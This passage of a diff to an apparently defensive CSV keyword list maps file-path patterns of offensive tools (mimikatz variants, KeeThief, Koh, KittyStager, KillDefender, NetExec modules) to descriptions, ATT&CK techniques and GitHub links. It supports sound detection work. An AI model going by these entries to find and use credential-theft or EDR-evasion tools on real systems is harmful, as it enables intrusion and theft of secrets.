T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*\impacket.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*\impersonate.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\Implant.exe *","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*\implant.exe *.exe","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" -"*\ImplantSSP.exe*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense 
Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\ImplantSSP.exe*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\InactiveDomainAdmins.csv*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" -"*\inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*\injector.ps1 1 *","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","262","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" -"*\injector.ps1 2 *","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","262","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" 
+"*\inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*\injector.ps1 1 *","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*\injector.ps1 2 *","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*\install_elevated.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\Inveigh.exe*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" "*\inveigh.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*\Inveigh\bin\*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" -"*\IPfuscation.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*\IPfuscation.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*\irs.exe*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","77","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*\IOXIDResolver.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active 
Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\IPfuscation.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*\IPfuscation.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*\irs.exe*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "*\JuicyPotatoNG*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" 
-"*\JunctionFolder.csproj*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*\katz.ps1*","offensive_tool_keyword","mimikatz","mimikatz powershell alternative name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*\JunctionFolder.csproj*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. 
On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\katz.ps1*","offensive_tool_keyword","mimikatz","mimikatz powershell alternative name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*\kdstab.exe*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*\keepass_discover.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\keepass_trigger.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\KeeTheft.exe*","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","0","private github repo","10","","N/A","","","" "*\kerberoast.c*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*\KernelTokens.sys*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" -"*\Keylogger.txt*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - 
T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","7","662","118","2023-09-25T10:50:52Z","2022-09-04T10:48:49Z" +"*\Keylogger.txt*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","7","662","118","2023-10-04T15:20:08Z","2022-09-04T10:48:49Z" "*\KillDefender.c*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" "*\KillDefender.o*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" -"*\kitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*\KittyStager*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*\kitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*\KittyStager*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*\Koh.exe*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*\Koh.pdb*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*\Koh\Koh.*","offensive_tool_keyword","cobaltstrike","Koh is a C# and 
Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" -"*\krb5\*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*\krb5\*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*\KRBUACBypass*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "*\Ladon.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "*\Ladon.ps1*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*\laps.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\LAPSDumper\*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" "*\ldap_search_bof.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's 
LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*\ldap-checker.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\LibSnaffle*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","0","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" "*\Loader\Loader.csproj*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - 